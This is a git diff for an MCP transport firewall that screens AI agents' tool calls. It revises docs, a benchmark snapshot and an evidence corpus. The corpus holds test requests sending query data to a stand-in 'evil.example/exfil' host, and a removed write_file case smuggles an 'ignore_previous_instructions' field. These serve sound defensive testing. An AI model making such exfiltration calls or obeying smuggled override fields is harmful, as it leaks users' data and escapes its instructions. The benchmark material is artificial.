@@ -51,7 +51,7 @@ Mode 2: protected downstream proxy
 1. shared-secret authorization and scope extraction
 2. scope validation
 3. color-boundary validation
-4. preflight validation for `blue` actions
+4. preflight validation for explicit `blue` actions and default high-trust tool families
 5. strict schema validation for registered tool contracts
 6. egress and injection marker validation
 

--- a/docs/RUNTIME_CONTRACT.md
+++ b/docs/RUNTIME_CONTRACT.md
@@ -82,6 +82,16 @@ Observed denial surfaces include:
 - cache behavior is L1 memory plus L2 SQLite persistence
 - cache keys are derived from `serverId`, method name, and request parameters
 
+## Secondary operator-state contract
+
+- the HTTP/admin route registry now survives restart
+- on process start, secondary-surface route state is restored from `route-registry.json` under the startup cache root (`MCP_CACHE_DIR` or the default `.mcp-cache` directory)
+- admin route registration, deletion, and clear operations update that on-disk snapshot before the in-memory registry is swapped in
+- if the route snapshot is missing, unreadable, or invalid, the HTTP harness fails closed with an empty registry instead of guessing
+- preflight registrations remain in-memory and do not survive restart
+- color-boundary session state remains in-memory and does not survive restart
+- tenant rate-limit config remains in-memory and does not survive restart in this batch
+
 ## Core runtime variables
 
 | Variable | Mode | Behavior |

--- a/docs/RUNTIME_CONTRACT.md
+++ b/docs/RUNTIME_CONTRACT.md
@@ -14,21 +14,22 @@ Recommended order:
 
 1. prove the boundary locally with `npm run demo:stdio`
 2. wire protected downstream proxy mode into your MCP client
-3. use standalone bundled mode only when you want embedded status tools without a downstream target
+3. use the embedded fallback path only when you want bundled status tools without wiring another downstream target
 
-## Runtime modes
+## Runtime paths
 
-Mode 1: standalone bundled MCP server
+Mode 1: bundled embedded target
 
-- selected when no downstream target is supplied
+- reached when the current package entrypoint runs with `--embedded-target`
 - starts the embedded MCP server from `src/embedded/server.ts`
 - exposes `firewall_status` and `firewall_usage`
+- serves as the default fallback target behind the stdio boundary when no explicit downstream target is supplied
 
 Mode 2: protected downstream proxy
 
-- selected when a target is supplied through CLI flags or environment
+- this is the default operator-facing CLI path
 - starts the stdio firewall proxy from `src/stdio/proxy.ts`
-- forwards allowed traffic to the downstream MCP server and returns sanitized results
+- forwards allowed traffic to either an explicit downstream MCP server or the bundled embedded fallback target, then returns sanitized results
 
 ## Target resolution order
 
@@ -37,7 +38,7 @@ Mode 2: protected downstream proxy
 3. `MCP_TARGET_COMMAND` plus `MCP_TARGET_ARGS_JSON`
 4. `MCP_TARGET_COMMAND` plus `MCP_TARGET_ARGS`
 5. `MCP_TARGET`
-6. bundled standalone fallback
+6. current package entrypoint with `--embedded-target`
 
 ## Inspected wire scope
 
@@ -51,9 +52,9 @@ Mode 2: protected downstream proxy
 1. shared-secret authorization and scope extraction
 2. scope validation
 3. color-boundary validation
-4. preflight validation for explicit `blue` actions and default high-trust tool families
-5. strict schema validation for registered tool contracts
-6. egress and injection marker validation
+4. egress and injection marker validation
+5. preflight validation for explicit `blue` actions and default high-trust tool families
+6. strict schema validation for registered tool contracts
 
 Blocked requests fail closed and are not forwarded to the downstream target.
 

--- a/docs/RUNTIME_CONTRACT.md
+++ b/docs/RUNTIME_CONTRACT.md
@@ -65,7 +65,7 @@ Observed denial surfaces include:
 - mixed trust domains
 - missing, expired, or replayed preflight IDs
 - schema mismatch on registered tools
-- ShadowLeak, sensitive-path, shell-injection, and epistemic-risk markers
+- ShadowLeak, including repeated short-chunk URL exfiltration, plus sensitive-path, shell-injection, and epistemic-risk markers
 
 ## Downstream failure behavior
 

--- a/docs/SHIP_CHECKLIST.md
+++ b/docs/SHIP_CHECKLIST.md
@@ -2,6 +2,14 @@
 
 Use this checklist before cutting a tagged release.
 
+Release-candidate boundary:
+
+- confirm the candidate still preserves one local filesystem/search MCP workflow over stdio as the primary story
+- confirm `public/current` and `local-only` state are written separately in repo and handoff docs
+- confirm the intended candidate is one coherent branch boundary, not a mental merge of unrelated draft PRs and side branches
+- confirm any carry-over from `project/naming-and-ci-discipline` is limited to non-renaming hygiene or is explicitly deferred
+- do not claim exact `2.2.6` contents until that candidate exists as a real review boundary
+
 Pre-release:
 
 - confirm `main` is the intended release source

--- a/docs/STDIO_BENCHMARK_GUIDE.md
+++ b/docs/STDIO_BENCHMARK_GUIDE.md
@@ -39,9 +39,10 @@ The current corpus covers:
 - epistemic-contradiction denial on `search_files`
 - missing-authorization `search_files`
 - missing-scope denial on `execute_command`
-- strict schema rejection for invalid `fetch_url`
-- strict schema rejection for smuggled `write_file` arguments
+- missing preflight denial on default-high-trust `fetch_url`
+- missing preflight denial on default-high-trust `write_file`
 - mixed-trust cross-tool hijack denial in a bundled `tools` payload
+- missing preflight denial on default-high-trust `execute_command`
 - missing and unregistered preflight IDs for `blue` actions
 
 Definitions:

--- a/docs/STDIO_BENCHMARK_GUIDE.md
+++ b/docs/STDIO_BENCHMARK_GUIDE.md
@@ -32,7 +32,7 @@ The current corpus covers:
 - cacheable `read_file`
 - cacheable `open_file`
 - cacheable `list_directory`
-- ShadowLeak-style `fetch_url` exfiltration
+- ShadowLeak-style `fetch_url` exfiltration, including repeated short chunks under one query key
 - sensitive-path `read_file`
 - sensitive-path `write_file`
 - shell-injection `execute_command`

--- a/docs/STDIO_BENCHMARK_SNAPSHOT.json
+++ b/docs/STDIO_BENCHMARK_SNAPSHOT.json
@@ -2,8 +2,8 @@
   "benchmark": "stdio-evidence-benchmark",
   "description": "Repeatable validation corpus for fail-closed stdio evidence and false-positive measurement.",
   "source": "examples\\evidence-corpus.json",
-  "startedAt": "2026-04-02T11:10:57.252Z",
-  "finishedAt": "2026-04-02T11:11:11.457Z",
+  "startedAt": "2026-04-02T15:38:06.473Z",
+  "finishedAt": "2026-04-02T15:38:14.133Z",
   "verdict": "passed",
   "cases": [
     {
@@ -228,20 +228,20 @@
       ]
     },
     {
-      "id": "block-sensitive-path-read-file",
+      "id": "block-shadowleak-repeated-short-chunks-fetch-url",
       "kind": "block",
       "repeat": 1,
-      "expectedCode": "SENSITIVE_PATH_BLOCKED",
+      "expectedCode": "SHADOWLEAK_DETECTED",
       "requests": [
         {
           "id": 12,
           "status": "blocked",
-          "errorCode": "SENSITIVE_PATH_BLOCKED"
+          "errorCode": "SHADOWLEAK_DETECTED"
         }
       ]
     },
     {
-      "id": "block-sensitive-path-write-file",
+      "id": "block-sensitive-path-read-file",
       "kind": "block",
       "repeat": 1,
       "expectedCode": "SENSITIVE_PATH_BLOCKED",
@@ -254,13 +254,26 @@
       ]
     },
     {
+      "id": "block-sensitive-path-write-file",
+      "kind": "block",
+      "repeat": 1,
+      "expectedCode": "SENSITIVE_PATH_BLOCKED",
+      "requests": [
+        {
+          "id": 14,
+          "status": "blocked",
+          "errorCode": "SENSITIVE_PATH_BLOCKED"
+        }
+      ]
+    },
+    {
       "id": "block-shell-injection-execute-command",
       "kind": "block",
       "repeat": 1,
       "expectedCode": "SHELL_INJECTION_BLOCKED",
       "requests": [
         {
-          "id": 14,
+          "id": 15,
           "status": "blocked",
           "errorCode": "SHELL_INJECTION_BLOCKED"
         }
@@ -273,7 +286,7 @@
       "expectedCode": "EPISTEMIC_CONTRADICTION_DETECTED",
       "requests": [
         {
-          "id": 15,
+          "id": 16,
           "status": "blocked",
           "errorCode": "EPISTEMIC_CONTRADICTION_DETECTED"
         }
@@ -286,7 +299,7 @@
       "expectedCode": "AUTH_FAILURE",
       "requests": [
         {
-          "id": 16,
+          "id": 17,
           "status": "blocked",
           "errorCode": "AUTH_FAILURE"
         }
@@ -299,7 +312,7 @@
       "expectedCode": "MISSING_SCOPE",
       "requests": [
         {
-          "id": 17,
+          "id": 18,
           "status": "blocked",
           "errorCode": "MISSING_SCOPE"
         }
@@ -312,7 +325,7 @@
       "expectedCode": "PREFLIGHT_REQUIRED",
       "requests": [
         {
-          "id": 18,
+          "id": 19,
           "status": "blocked",
           "errorCode": "PREFLIGHT_REQUIRED"
         }
@@ -325,7 +338,7 @@
       "expectedCode": "PREFLIGHT_REQUIRED",
       "requests": [
         {
-          "id": 19,
+          "id": 20,
           "status": "blocked",
           "errorCode": "PREFLIGHT_REQUIRED"
         }
@@ -338,7 +351,7 @@
       "expectedCode": "CROSS_TOOL_HIJACK_ATTEMPT",
       "requests": [
         {
-          "id": 20,
+          "id": 21,
           "status": "blocked",
           "errorCode": "CROSS_TOOL_HIJACK_ATTEMPT"
         }
@@ -351,7 +364,7 @@
       "expectedCode": "PREFLIGHT_REQUIRED",
       "requests": [
         {
-          "id": 21,
+          "id": 22,
           "status": "blocked",
           "errorCode": "PREFLIGHT_REQUIRED"
         }
@@ -364,7 +377,7 @@
       "expectedCode": "PREFLIGHT_REQUIRED",
       "requests": [
         {
-          "id": 22,
+          "id": 23,
           "status": "blocked",
           "errorCode": "PREFLIGHT_REQUIRED"
         }
@@ -377,7 +390,7 @@
       "expectedCode": "PREFLIGHT_NOT_FOUND",
       "requests": [
         {
-          "id": 23,
+          "id": 24,
           "status": "blocked",
           "errorCode": "PREFLIGHT_NOT_FOUND"
         }
@@ -385,17 +398,17 @@
     }
   ],
   "totals": {
-    "cases": 18,
-    "requests": 23,
+    "cases": 19,
+    "requests": 24,
     "allowedRequests": 10,
-    "blockedRequests": 13,
+    "blockedRequests": 14,
     "cacheHits": 5,
     "cacheConsistencyFailures": 0,
     "falsePositives": 0,
     "falseNegatives": 0
   },
   "blockedByCode": {
-    "SHADOWLEAK_DETECTED": 1,
+    "SHADOWLEAK_DETECTED": 2,
     "SENSITIVE_PATH_BLOCKED": 2,
     "SHELL_INJECTION_BLOCKED": 1,
     "EPISTEMIC_CONTRADICTION_DETECTED": 1,

--- a/docs/STDIO_BENCHMARK_SNAPSHOT.json
+++ b/docs/STDIO_BENCHMARK_SNAPSHOT.json
@@ -2,8 +2,8 @@
   "benchmark": "stdio-evidence-benchmark",
   "description": "Repeatable validation corpus for fail-closed stdio evidence and false-positive measurement.",
   "source": "examples\\evidence-corpus.json",
-  "startedAt": "2026-03-28T11:44:46.316Z",
-  "finishedAt": "2026-03-28T11:44:54.552Z",
+  "startedAt": "2026-04-02T11:10:57.252Z",
+  "finishedAt": "2026-04-02T11:11:11.457Z",
   "verdict": "passed",
   "cases": [
     {
@@ -306,28 +306,28 @@
       ]
     },
     {
-      "id": "block-schema-validation-fetch-url",
+      "id": "block-preflight-required-fetch-url-default-high-trust",
       "kind": "block",
       "repeat": 1,
-      "expectedCode": "SCHEMA_VALIDATION_FAILED",
+      "expectedCode": "PREFLIGHT_REQUIRED",
       "requests": [
         {
           "id": 18,
           "status": "blocked",
-          "errorCode": "SCHEMA_VALIDATION_FAILED"
+          "errorCode": "PREFLIGHT_REQUIRED"
         }
       ]
     },
     {
-      "id": "block-schema-smuggled-write-file",
+      "id": "block-preflight-required-write-file-default-high-trust",
       "kind": "block",
       "repeat": 1,
-      "expectedCode": "SCHEMA_VALIDATION_FAILED",
+      "expectedCode": "PREFLIGHT_REQUIRED",
       "requests": [
         {
           "id": 19,
           "status": "blocked",
-          "errorCode": "SCHEMA_VALIDATION_FAILED"
+          "errorCode": "PREFLIGHT_REQUIRED"
         }
       ]
     },
@@ -358,13 +358,26 @@
       ]
     },
     {
+      "id": "block-preflight-required-default-high-trust-tool",
+      "kind": "block",
+      "repeat": 1,
+      "expectedCode": "PREFLIGHT_REQUIRED",
+      "requests": [
+        {
+          "id": 22,
+          "status": "blocked",
+          "errorCode": "PREFLIGHT_REQUIRED"
+        }
+      ]
+    },
+    {
       "id": "block-preflight-not-found-blue-tool",
       "kind": "block",
       "repeat": 1,
       "expectedCode": "PREFLIGHT_NOT_FOUND",
       "requests": [
         {
-          "id": 22,
+          "id": 23,
           "status": "blocked",
           "errorCode": "PREFLIGHT_NOT_FOUND"
         }
@@ -372,10 +385,10 @@
     }
   ],
   "totals": {
-    "cases": 17,
-    "requests": 22,
+    "cases": 18,
+    "requests": 23,
     "allowedRequests": 10,
-    "blockedRequests": 12,
+    "blockedRequests": 13,
     "cacheHits": 5,
     "cacheConsistencyFailures": 0,
     "falsePositives": 0,
@@ -388,9 +401,8 @@
     "EPISTEMIC_CONTRADICTION_DETECTED": 1,
     "AUTH_FAILURE": 1,
     "MISSING_SCOPE": 1,
-    "SCHEMA_VALIDATION_FAILED": 2,
+    "PREFLIGHT_REQUIRED": 4,
     "CROSS_TOOL_HIJACK_ATTEMPT": 1,
-    "PREFLIGHT_REQUIRED": 1,
     "PREFLIGHT_NOT_FOUND": 1
   }
 }

--- a/docs/SYSTEM_OVERVIEW.md
+++ b/docs/SYSTEM_OVERVIEW.md
@@ -4,10 +4,10 @@ Updated: 2026-04-02
 
 ## Product Shape
 
-`mcp-transport-firewall` ships one npm package with two runtime modes:
+`mcp-transport-firewall` ships one npm package with one operator-facing stdio boundary and one bundled embedded fallback target:
 
-- standalone embedded MCP server for status/help tools
 - downstream stdio firewall proxy for a real local MCP target
+- bundled embedded MCP server for status/help tools when no external target is configured
 
 The package surface is defined in `package.json` and currently exported as:
 
@@ -23,7 +23,7 @@ The primary path is the stdio proxy:
 3. `src/runtime-config.ts` resolves bounded runtime settings.
 4. `src/stdio/proxy.ts` spawns the target, inspects `tools/call`, enforces trust gates, serves cache hits where allowed, and sanitizes downstream responses.
 
-If no target is supplied, `src/embedded/server.ts` starts the bundled standalone MCP server and exposes:
+If no target is supplied, `src/cli-options.ts` falls back to the current package entrypoint with `--embedded-target`. The operator still talks to the stdio proxy, and the bundled tools come from `src/embedded/server.ts`:
 
 - `firewall_status`
 - `firewall_usage`

--- a/docs/SYSTEM_OVERVIEW.md
+++ b/docs/SYSTEM_OVERVIEW.md
@@ -42,8 +42,10 @@ Important runtime nuance:
 ## Stateful Subsystems
 
 - `src/cache/index.ts`: swappable global cache manager with L1 memory + L2 SQLite persistence
-- `src/middleware/preflight-validator.ts`: in-memory preflight and replay registries
-- `src/proxy/router.ts`: in-memory tool-to-target route registry for the HTTP harness
+- `src/proxy/router.ts`: live tool-to-target route registry for the HTTP harness, restored from a local `route-registry.json` snapshot under the startup cache root
+- `src/middleware/preflight-validator.ts`: in-memory preflight and replay registries that reset on restart
+- `src/middleware/color-boundary.ts`: in-memory color session state that resets on restart
+- `src/middleware/rate-limiter.ts`: in-memory tenant override config that resets on restart in this batch
 
 ## Verification Surface
 

--- a/docs/SYSTEM_OVERVIEW.md
+++ b/docs/SYSTEM_OVERVIEW.md
@@ -1,0 +1,54 @@
+# System Overview
+
+Updated: 2026-04-02
+
+## Product Shape
+
+`mcp-transport-firewall` ships one npm package with two runtime modes:
+
+- standalone embedded MCP server for status/help tools
+- downstream stdio firewall proxy for a real local MCP target
+
+The package surface is defined in `package.json` and currently exported as:
+
+- CLI bin: `dist/cli.js`
+- library entry: `dist/lib.js`
+
+## Primary User-Facing Path
+
+The primary path is the stdio proxy:
+
+1. `src/cli.ts` parses CLI/env input.
+2. `src/cli-options.ts` resolves the downstream target.
+3. `src/runtime-config.ts` resolves bounded runtime settings.
+4. `src/stdio/proxy.ts` spawns the target, inspects `tools/call`, enforces trust gates, serves cache hits where allowed, and sanitizes downstream responses.
+
+If no target is supplied, `src/embedded/server.ts` starts the bundled standalone MCP server and exposes:
+
+- `firewall_status`
+- `firewall_usage`
+
+## Secondary Surfaces
+
+- `src/index.ts`: HTTP compatibility harness
+- `src/admin/index.ts`: admin API plus optional dashboard hosting
+- `src/metrics/prometheus.ts`: Prometheus exporter
+
+Important runtime nuance:
+
+- the stdio proxy works from the CLI target configuration
+- the HTTP `/mcp` harness has no built-in route map; it only forwards requests after routes are registered through the admin control plane
+
+## Stateful Subsystems
+
+- `src/cache/index.ts`: swappable global cache manager with L1 memory + L2 SQLite persistence
+- `src/middleware/preflight-validator.ts`: in-memory preflight and replay registries
+- `src/proxy/router.ts`: in-memory tool-to-target route registry for the HTTP harness
+
+## Verification Surface
+
+The current verification model is split across:
+
+- unit/integration tests in `tests/`
+- tarball smoke in `scripts/pack-smoke.mjs`
+- package metadata and release guards in `scripts/assert-package-metadata.mjs`, `scripts/verify-release-parity.mjs`, and `scripts/verify-registry-metadata.mjs`

--- a/docs/VERIFICATION_GUIDE.md
+++ b/docs/VERIFICATION_GUIDE.md
@@ -1,5 +1,7 @@
 ## Verification Guide
 
+Updated: 2026-04-02
+
 This repository is easiest to verify as a reproducible transport control, not as a polished product demo.
 
 Recommended verification flow:
@@ -7,17 +9,21 @@ Recommended verification flow:
 1. inspect the risk model in [RISK_MODEL.md](RISK_MODEL.md)
 2. inspect the local setup examples in [CLIENT_CONFIG_EXAMPLES.md](CLIENT_CONFIG_EXAMPLES.md)
 3. inspect the runtime guarantees in [RUNTIME_CONTRACT.md](RUNTIME_CONTRACT.md)
-4. run `npm run verify:all`
-5. run `npm run benchmark:stdio -- --json --output evidence.json`
-6. run `npm run pack:dry-run`
-7. run `npm run pack:smoke`
-8. inspect `/metrics` on the admin control plane when running the Docker path
-9. compare documented claims to tests, benchmark results, tarball behavior, and control-plane state
+4. run `npm run assert:package-metadata`
+5. run `npm test`
+6. run `npm run verify:all`
+7. run `npm run benchmark:stdio -- --json --output evidence.json`
+8. run `npm run pack:dry-run`
+9. run `npm run pack:smoke`
+10. inspect `/metrics` on the admin control plane when running the Docker path
+11. compare documented claims to tests, benchmark results, tarball behavior, and control-plane state
 
 | Topic | Code | Evidence |
 |---|---|---|
 | stdio interception path | `src/cli.ts`, `src/stdio/proxy.ts` | `tests/cli.test.ts`, `scripts/stdio-demo.mjs` |
 | repeatable evidence corpus | `scripts/stdio-benchmark.mjs`, `examples/evidence-corpus.json` | `docs/STDIO_BENCHMARK_GUIDE.md` |
+| package install contract | `scripts/assert-package-metadata.mjs` | `tests/release-guardrails.test.ts` |
+| packaged downstream proxy proof | `scripts/pack-smoke.mjs` | `tests/package-proxy-smoke.test.ts` |
 | fail-closed auth | `src/middleware/nhi-auth-validator.ts` | `tests/nhi-auth.test.ts`, `tests/cli.test.ts` |
 | scope enforcement | `src/middleware/scope-validator.ts` | `tests/scope-validator.test.ts` |
 | trust-domain separation | `src/middleware/color-boundary.ts` | `tests/color-boundary.test.ts` |
@@ -46,9 +52,10 @@ Use the stdio path when you want:
 - proof that blocked traffic fails before tool execution
 - reproducible benchmark output from a deterministic local target
 
-CI does three useful things:
+CI does four useful things:
 
 - runs the full verification suite
+- keeps the package install contract pinned in testable metadata guardrails
 - uploads a JSON benchmark artifact named `stdio-evidence-benchmark`
 - runs distributable tarball smoke checks before npm publication
 

--- a/docs/VERIFICATION_GUIDE.md
+++ b/docs/VERIFICATION_GUIDE.md
@@ -4,7 +4,17 @@ Updated: 2026-04-02
 
 This repository is easiest to verify as a reproducible transport control, not as a polished product demo.
 
-Recommended verification flow:
+## Short proof path
+
+Use this when you want the smallest repo-local proof of the main workflow:
+
+1. run `npm install`
+2. run `npm run build`
+3. run `npm run demo:stdio`
+
+That path proves one protected local filesystem/search-style workflow over `stdio`: safe `search_files` traffic reaches the downstream target, repeated allow traffic can be cached, and risky traffic is blocked before downstream execution.
+
+## Full verification flow
 
 1. inspect the risk model in [RISK_MODEL.md](RISK_MODEL.md)
 2. inspect the local setup examples in [CLIENT_CONFIG_EXAMPLES.md](CLIENT_CONFIG_EXAMPLES.md)

--- a/docs/VERIFICATION_GUIDE.md
+++ b/docs/VERIFICATION_GUIDE.md
@@ -83,7 +83,7 @@ What this repo currently demonstrates:
 - fail-closed blocking on mixed red/blue trust domains
 - fail-closed blocking on missing, replayed, or unregistered preflight IDs for high-trust tools
 - strict argument validation for registered tool schemas
-- blocking of ShadowLeak-style exfiltration patterns
+- blocking of ShadowLeak-style exfiltration patterns, including repeated short chunks under one query key
 - response sanitization before tool output is returned
 - reproducible benchmark output and control-plane metrics
 

--- a/docs/VERIFICATION_GUIDE.md
+++ b/docs/VERIFICATION_GUIDE.md
@@ -81,7 +81,7 @@ What this repo currently demonstrates:
 - fail-closed blocking on missing or invalid auth
 - fail-closed blocking on scope mismatch
 - fail-closed blocking on mixed red/blue trust domains
-- fail-closed blocking on missing or replayed preflight IDs
+- fail-closed blocking on missing, replayed, or unregistered preflight IDs for high-trust tools
 - strict argument validation for registered tool schemas
 - blocking of ShadowLeak-style exfiltration patterns
 - response sanitization before tool output is returned

--- a/examples/README.md
+++ b/examples/README.md
@@ -41,7 +41,7 @@ Canonical MCP client configuration path:
       "env": {
         "PROXY_AUTH_TOKEN": "replace-with-32-byte-secret",
         "MCP_TARGET_COMMAND": "node",
-        "MCP_TARGET_ARGS_JSON": "[\"C:/absolute/path/to/your-mcp-server.js\"]"
+        "MCP_TARGET_ARGS_JSON": "[\"C:/absolute/path/to/mcp-transport-firewall/examples/demo-target.js\"]"
       }
     }
   }
@@ -55,11 +55,12 @@ Read/search-shaped protected workflow using the packaged CLI:
 ```powershell
 $env:PROXY_AUTH_TOKEN = "12345678901234567890123456789012"
 $env:MCP_TARGET_COMMAND = "node"
-$env:MCP_TARGET_ARGS_JSON = "[\"C:/absolute/path/to/examples/demo-target.js\"]"
+$env:MCP_TARGET_ARGS_JSON = "[\"C:/absolute/path/to/mcp-transport-firewall/examples/demo-target.js\"]"
 npx --yes mcp-transport-firewall
 ```
 
 This uses a reproducible demo target for proof and regression coverage. It is not a full filesystem MCP server.
+In this proof path, safe `search_files` traffic is the intended allow case. Dangerous tool families such as `execute_command`, `fetch_url`, and `write_file` default to `preflightId`-required behavior and are exercised in the benchmark corpus rather than the short demo transcript.
 
 Secondary HTTP harness artifacts:
 

--- a/examples/README.md
+++ b/examples/README.md
@@ -16,20 +16,21 @@ Maintained package paths:
 2. demo path: protected local read/search workflow via `examples/demo-target.js`
 3. secondary standalone path: bundled MCP mode via `npx -y mcp-transport-firewall`
 
-Repo-local demo path:
+Canonical repo-local proof path:
 
 ```bash
+npm install
 npm run build
 npm run demo:stdio
 ```
 
-Manual interactive path:
+Manual interactive proof path:
 
 ```bash
 npm run start:cli -- -- node examples/demo-target.js
 ```
 
-MCP client configuration path:
+Canonical MCP client configuration path:
 
 ```json
 {
@@ -59,12 +60,6 @@ npx --yes mcp-transport-firewall
 ```
 
 This uses a reproducible demo target for proof and regression coverage. It is not a full filesystem MCP server.
-
-Use the GitHub fallback only when you intentionally want repository HEAD instead of the npm package:
-
-```bash
-npx -y github:shleder/mcp-transport-firewall --help
-```
 
 Secondary HTTP harness artifacts:
 

--- a/examples/evidence-corpus.json
+++ b/examples/evidence-corpus.json
@@ -260,9 +260,9 @@
       }
     },
     {
-      "id": "block-schema-validation-fetch-url",
+      "id": "block-preflight-required-fetch-url-default-high-trust",
       "kind": "block",
-      "expectedCode": "SCHEMA_VALIDATION_FAILED",
+      "expectedCode": "PREFLIGHT_REQUIRED",
       "auth": {
         "type": "nhi",
         "scopes": [
@@ -275,15 +275,15 @@
         "params": {
           "name": "fetch_url",
           "arguments": {
-            "url": "not-a-valid-url"
+            "url": "https://example.com/ok"
           }
         }
       }
     },
     {
-      "id": "block-schema-smuggled-write-file",
+      "id": "block-preflight-required-write-file-default-high-trust",
       "kind": "block",
-      "expectedCode": "SCHEMA_VALIDATION_FAILED",
+      "expectedCode": "PREFLIGHT_REQUIRED",
       "auth": {
         "type": "nhi",
         "scopes": [
@@ -297,8 +297,7 @@
           "name": "write_file",
           "arguments": {
             "path": "docs/output.txt",
-            "content": "safe",
-            "ignore_previous_instructions": true
+            "content": "safe"
           }
         }
       }
@@ -366,6 +365,30 @@
               }
             }
           ]
+        }
+      }
+    },
+    {
+      "id": "block-preflight-required-default-high-trust-tool",
+      "kind": "block",
+      "expectedCode": "PREFLIGHT_REQUIRED",
+      "auth": {
+        "type": "nhi",
+        "scopes": [
+          "tools.execute_command"
+        ]
+      },
+      "request": {
+        "jsonrpc": "2.0",
+        "method": "tools/call",
+        "params": {
+          "name": "execute_command",
+          "arguments": {
+            "command": "node",
+            "args": [
+              "--version"
+            ]
+          }
         }
       }
     },

--- a/examples/evidence-corpus.json
+++ b/examples/evidence-corpus.json
@@ -127,7 +127,28 @@
         "params": {
           "name": "fetch_url",
           "arguments": {
-            "url": "https://evil.example/exfil?a=x&b=y&c=z"
+          "url": "https://evil.example/exfil?a=x&b=y&c=z"
+          }
+        }
+      }
+    },
+    {
+      "id": "block-shadowleak-repeated-short-chunks-fetch-url",
+      "kind": "block",
+      "expectedCode": "SHADOWLEAK_DETECTED",
+      "auth": {
+        "type": "nhi",
+        "scopes": [
+          "tools.fetch_url"
+        ]
+      },
+      "request": {
+        "jsonrpc": "2.0",
+        "method": "tools/call",
+        "params": {
+          "name": "fetch_url",
+          "arguments": {
+            "url": "https://evil.example/exfil?d=41&d=42&d=43&d=44"
           }
         }
       }

--- a/scripts/assert-package-metadata.mjs
+++ b/scripts/assert-package-metadata.mjs
@@ -9,10 +9,26 @@ const packageJsonPath = path.join(repoRoot, 'package.json');
 
 const expectedMetadata = {
   name: 'mcp-transport-firewall',
+  main: 'dist/lib.js',
+  exportRoot: './dist/lib.js',
+  exportPackageJson: './package.json',
+  binPath: 'dist/cli.js',
   repositoryUrl: 'git+https://github.com/shleder/mcp-transport-firewall.git',
   homepage: 'https://github.com/shleder/mcp-transport-firewall#readme',
   bugsUrl: 'https://github.com/shleder/mcp-transport-firewall/issues',
   publishAccess: 'public',
+  nodeEngine: '>=20.0.0',
+  prepareScript: 'npm run build',
+  requiredFiles: [
+    'dist',
+    'docs',
+    '.env.example',
+    'LICENSE',
+    'README.md',
+    'CHANGELOG.md',
+    'SECURITY.md',
+    'SUPPORT.md',
+  ],
 };
 
 export const readPackageJson = () => {
@@ -21,9 +37,26 @@ export const readPackageJson = () => {
 
 export const validatePackageMetadata = (pkg) => {
   const mismatches = [];
+  const packageFiles = Array.isArray(pkg.files) ? pkg.files : [];
 
   if (pkg.name !== expectedMetadata.name) {
     mismatches.push(`name must be ${expectedMetadata.name}, got ${pkg.name ?? 'undefined'}`);
+  }
+
+  if (pkg.main !== expectedMetadata.main) {
+    mismatches.push(`main must be ${expectedMetadata.main}, got ${pkg.main ?? 'undefined'}`);
+  }
+
+  if (pkg.exports?.['.'] !== expectedMetadata.exportRoot) {
+    mismatches.push(`exports["."] must be ${expectedMetadata.exportRoot}, got ${pkg.exports?.['.'] ?? 'undefined'}`);
+  }
+
+  if (pkg.exports?.['./package.json'] !== expectedMetadata.exportPackageJson) {
+    mismatches.push(`exports["./package.json"] must be ${expectedMetadata.exportPackageJson}, got ${pkg.exports?.['./package.json'] ?? 'undefined'}`);
+  }
+
+  if (pkg.bin?.['mcp-transport-firewall'] !== expectedMetadata.binPath) {
+    mismatches.push(`bin.mcp-transport-firewall must be ${expectedMetadata.binPath}, got ${pkg.bin?.['mcp-transport-firewall'] ?? 'undefined'}`);
   }
 
   if (pkg.repository?.url !== expectedMetadata.repositoryUrl) {
@@ -40,6 +73,20 @@ export const validatePackageMetadata = (pkg) => {
 
   if (pkg.publishConfig?.access !== expectedMetadata.publishAccess) {
     mismatches.push(`publishConfig.access must be ${expectedMetadata.publishAccess}, got ${pkg.publishConfig?.access ?? 'undefined'}`);
+  }
+
+  if (pkg.engines?.node !== expectedMetadata.nodeEngine) {
+    mismatches.push(`engines.node must be ${expectedMetadata.nodeEngine}, got ${pkg.engines?.node ?? 'undefined'}`);
+  }
+
+  if (pkg.scripts?.prepare !== expectedMetadata.prepareScript) {
+    mismatches.push(`scripts.prepare must be ${expectedMetadata.prepareScript}, got ${pkg.scripts?.prepare ?? 'undefined'}`);
+  }
+
+  for (const requiredFile of expectedMetadata.requiredFiles) {
+    if (!packageFiles.includes(requiredFile)) {
+      mismatches.push(`files must include ${requiredFile}`);
+    }
   }
 
   return mismatches;

--- a/src/admin/index.ts
+++ b/src/admin/index.ts
@@ -154,22 +154,46 @@ const createAdminRouter = (): express.Router => {
       auditLog('ADMIN_ROUTE_REGISTERED', { toolName: parsed.toolName, url: parsed.url });
       res.json({ success: true, toolName: parsed.toolName });
     } catch (error) {
-      res.status(400).json({ error: { code: 'INVALID_CONFIG', message: error instanceof Error ? error.message : 'Invalid route config' } });
+      const isValidationError = error instanceof z.ZodError;
+      res.status(isValidationError ? 400 : 500).json({
+        error: {
+          code: isValidationError ? 'INVALID_CONFIG' : 'ROUTE_PERSISTENCE_ERROR',
+          message: error instanceof Error ? error.message : 'Invalid route config',
+        },
+      });
     }
   });
 
   router.delete('/routes/:toolName', adminAuthMiddleware, (req: Request, res: Response) => {
-    const toolName = String(req.params.toolName);
-    const removed = removeRoute(toolName);
-    auditLog('ADMIN_ROUTE_REMOVED', { toolName, removed });
-    res.json({ success: removed, toolName });
+    try {
+      const toolName = String(req.params.toolName);
+      const removed = removeRoute(toolName);
+      auditLog('ADMIN_ROUTE_REMOVED', { toolName, removed });
+      res.json({ success: removed, toolName });
+    } catch (error) {
+      res.status(500).json({
+        error: {
+          code: 'ROUTE_PERSISTENCE_ERROR',
+          message: error instanceof Error ? error.message : 'Failed to update route registry state',
+        },
+      });
+    }
   });
 
   router.delete('/routes', adminAuthMiddleware, (_req: Request, res: Response) => {
-    clearRoutes();
-    clearColorSessions();
-    auditLog('ADMIN_ROUTES_CLEARED', {});
-    res.json({ success: true });
+    try {
+      clearRoutes();
+      clearColorSessions();
+      auditLog('ADMIN_ROUTES_CLEARED', {});
+      res.json({ success: true });
+    } catch (error) {
+      res.status(500).json({
+        error: {
+          code: 'ROUTE_PERSISTENCE_ERROR',
+          message: error instanceof Error ? error.message : 'Failed to clear route registry state',
+        },
+      });
+    }
   });
 
   router.get('/cache/stats', (_req: Request, res: Response) => {

--- a/src/index.ts
+++ b/src/index.ts
@@ -12,7 +12,7 @@ import { preflightValidator } from './middleware/preflight-validator.js';
 import { createRateLimiter } from './middleware/rate-limiter.js';
 import { createSchemaValidator } from './middleware/schema-validator.js';
 import { scopeValidator } from './middleware/scope-validator.js';
-import { routeRequest } from './proxy/router.js';
+import { configureRouteRegistryPersistence, routeRequest } from './proxy/router.js';
